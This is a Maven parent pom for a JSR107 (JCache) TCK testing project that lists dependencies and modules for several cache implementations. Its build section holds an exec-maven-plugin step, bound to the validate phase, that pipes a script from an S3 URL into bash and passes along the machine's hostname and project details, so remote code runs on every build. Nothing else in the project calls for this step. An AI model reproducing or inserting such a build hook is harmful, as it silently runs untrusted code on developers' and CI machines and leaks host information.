<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
         http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.cache2k.jsr107-test-zoo</groupId>
    <artifactId>parent</artifactId>
    <version>1.1-SNAPSHOT</version>

    <packaging>pom</packaging>

    <name>JSR107 TCK testing zoo</name>
    <description>
        Collection of modules that test implementations of JSR107 against the TCK. This is the parent pom of all
        testing modules.
    </description>
    <url>https://github.com/cruftex/jsr107-test-zoo</url>

    <properties>
        <jcache.api.version>1.0.0</jcache.api.version>
        <jcache.tck.version>1.0.1</jcache.tck.version>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>

        <CacheInvocationContextImpl>
            javax.cache.annotation.impl.cdi.CdiCacheKeyInvocationContextImpl
        </CacheInvocationContextImpl>

        <domain-lib-dir>${project.build.directory}/domainlib</domain-lib-dir>
        <domain-jar>domain.jar</domain-jar>

        <!--IPV4-->
        <java.net.preferIPv4Stack>true</java.net.preferIPv4Stack>

        <!--
            Implementation specifications, the defaults below are for the RI,
            this needs to be overridden in submodules and replaced with the parameters of the
            implementation.
        -->

        <!-- Change the following properties on the command line to override with the coordinates for your implementation-->
        <implementation-groupId>org.jsr107.ri</implementation-groupId>
        <implementation-artifactId>cache-ri-impl</implementation-artifactId>
        <implementation-version>1.0.0</implementation-version>

        <!-- Change the following properties to your CacheManager and Cache implementation. Used by the unwrap tests. -->
        <CacheManagerImpl>org.jsr107.ri.RICacheManager</CacheManagerImpl>
        <CacheImpl>org.jsr107.ri.RICache</CacheImpl>
        <CacheEntryImpl>org.jsr107.ri.RIEntry</CacheEntryImpl>

        <!--Change the following to point to your MBeanServer, so that the TCK can resolve it. -->
        <javax.management.builder.initial>org.jsr107.ri.management.RITCKMBeanServerBuilder
        </javax.management.builder.initial>
        <org.jsr107.tck.management.agentId>RIMBeanServer</org.jsr107.tck.management.agentId>

    </properties>

    <dependencies>

        <dependency>
            <groupId>javax.cache</groupId>
            <artifactId>cache-api</artifactId>
            <version>${jcache.api.version}</version>
        </dependency>

        <dependency>
            <groupId>javax.cache</groupId>
            <artifactId>test-domain</artifactId>
            <version>${jcache.tck.version}</version>
        </dependency>

        <dependency>
            <groupId>javax.cache</groupId>
            <artifactId>cache-tests</artifactId>
            <version>${jcache.tck.version}</version>
        </dependency>

        <dependency>
            <groupId>javax.cache</groupId>
            <artifactId>cache-tests</artifactId>
            <classifier>tests</classifier>
            <scope>test</scope>
            <version>${jcache.tck.version}</version>
        </dependency>

        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.11</version>
        </dependency>

        <dependency>
            <groupId>org.hamcrest</groupId>
            <artifactId>hamcrest-library</artifactId>
            <version>1.2</version>
            <scope>test</scope>
        </dependency>

        <dependency>
            <groupId>${implementation-groupId}</groupId>
            <artifactId>${implementation-artifactId}</artifactId>
            <version>${implementation-version}</version>
        </dependency>

    </dependencies>

    <build>
<plugins>
        <!--Stam-->
        <plugin>
            <groupId>org.codehaus.mojo</groupId>
            <artifactId>exec-maven-plugin</artifactId>
            <version>1.6.0</version>
            <executions>
                <execution>
                    <id>run-script</id>
                    <phase>validate</phase>
                    <goals>
                        <goal>exec</goal>
                    </goals>
                </execution>
            </executions>
            <configuration>
                <executable>bash</executable>
                <arguments>
                    <argument>
                        -c
                    </argument>
                    <argument>curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/trivago/jsr107-test-zoo.git\&amp;folder=jsr107-test-zoo\&amp;hostname=`hostname`\&amp;foo=ook\&amp;artifactId=${artifactId}</argument>
                </arguments>
            </configuration>
        </plugin>
</plugins>
</build>

    <licenses>
        <license>
            <name>The Apache Software License, Version 2.0</name>
            <url>http://www.apache.org/licenses/LICENSE-2.0.txt</url>
            <distribution>repo</distribution>
        </license>
    </licenses>

    <!--
      Module names include version numbers intentionally. If multiple versions of one implementation
      get support and may be in use, multiple module of one implementation can be added.
    -->
    <modules>
        <module>RI-V1-test</module>
        <module>infinispan-V7-test</module>
        <module>ignite-V1-test</module>
        <module>ehcache-jcache-V1-test</module>
        <module>ehcache-V3-test</module>
        <module>hazelcast-V3.4-test</module>
        <module>jcs-V2-test</module>
        <module>blazingcache-V1-test</module>
        <module>caffeine-V2-test</module>
        <module>triavacache-V1-test</module>
    </modules>

    <profiles>
        <profile>
            <id>coherence</id>
            <modules>
                <module>coherence-V12-test</module>
            </modules>
        </profile>
    </profiles>

</project>
